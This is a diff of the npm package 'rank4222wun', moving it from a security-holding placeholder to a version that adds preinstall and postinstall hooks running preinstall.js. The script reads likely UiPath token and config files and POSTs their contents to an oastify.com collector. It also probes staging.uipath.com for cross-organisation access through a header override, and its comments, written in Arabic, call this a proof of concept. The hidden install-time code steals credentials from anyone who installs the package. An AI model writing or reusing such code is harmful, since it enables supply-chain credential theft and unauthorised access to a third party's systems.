rank4222wun 0.0.1-security → 1.0.68

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.68",
+  "description": "",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js

@@ -0,0 +1,79 @@
+const https = require('https');
+const { execSync } = require('child_process');
+
+const OAST = '2z26icqfa6vjiez8lc55cd3nmes5gwlka.oastify.com';
+const CURRENT_ORG = '6ed7b646-ddb8-4936-a39a-aca4359eaa63';
+const TARGET_ORG = '00000000-0000-0000-0000-000000000000'; // سنركز على الـ System Org
+
+function report(tag, data) {
+    const payload = JSON.stringify({ tag, data, ts: Date.now() });
+    const req = https.request({
+        hostname: OAST, path: `/${tag}`, method: 'POST',
+        headers: { 'Content-Type': 'application/json' }
+    });
+    req.write(payload);
+    req.end();
+}
+
+// 1. محاولة استخراج أي Bearer Token من الذاكرة أو الملفات
+function findAuthToken() {
+    try {
+        // البحث في ملفات الإعدادات المحتملة للـ MCP
+        const paths = ['/tmp/session.json', './.uipath/config', '/home/user/.uipath/token'];
+        paths.forEach(p => {
+            if (require('fs').existsSync(p)) {
+                report('TOKEN_FILE_FOUND', { path: p, content: require('fs').readFileSync(p, 'utf8').substring(0, 50) });
+            }
+        });
+    } catch (e) {}
+}
+
+// 2. تتبع الـ 302 لمعرفة أين تذهب البيانات (Location Header)
+function followRedirect() {
+    const path = `/${TARGET_ORG}/0d0456a1-2029-427a-a8da-d7646edcd1fc/agenthub_/mcp/test1/runtime/info`;
+    
+    const options = {
+        hostname: 'staging.uipath.com',
+        path: path,
+        method: 'GET',
+        headers: { 'User-Agent': 'Mozilla/5.0' }
+    };
+
+    const req = https.request(options, (res) => {
+        const location = res.headers.location;
+        if (location) {
+            // إذا كان الرابط يحتوي على معلومات تخص Org أخرى، فهذا إثبات تسريب معلومات
+            report('REDIRECT_FOLLOWED', { 
+                from: TARGET_ORG,
+                to: location,
+                is_cross_org: location.includes(TARGET_ORG)
+            });
+        }
+    });
+    req.on('error', (e) => report('ERROR', e.message));
+    req.end();
+}
+
+// 3. اختبار الـ BOLA عبر الـ Headers (The Holy Grail)
+function testHeaderBypass() {
+    // محاولة إرسال Org ID في الـ Header مختلف عن الـ URL
+    const options = {
+        hostname: 'staging.uipath.com',
+        path: `/${CURRENT_ORG}/0d0456a1-2029-427a-a8da-d7646edcd1fc/agenthub_/mcp/test1/runtime/info`,
+        method: 'GET',
+        headers: {
+            'X-UIPATH-OrganizationId': TARGET_ORG, // محاولة إجبار السيرفر على النظر لـ Org أخرى
+            'X-UIPATH-TenantId': '0d0456a1-2029-427a-a8da-d7646edcd1fc'
+        }
+    };
+
+    const req = https.request(options, (res) => {
+        report('HEADER_BYPASS_ATTEMPT', { status: res.statusCode, header_used: TARGET_ORG });
+    });
+    req.end();
+}
+
+// تنفيذ الـ PoC
+findAuthToken();
+followRedirect();
+testHeaderBypass();

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.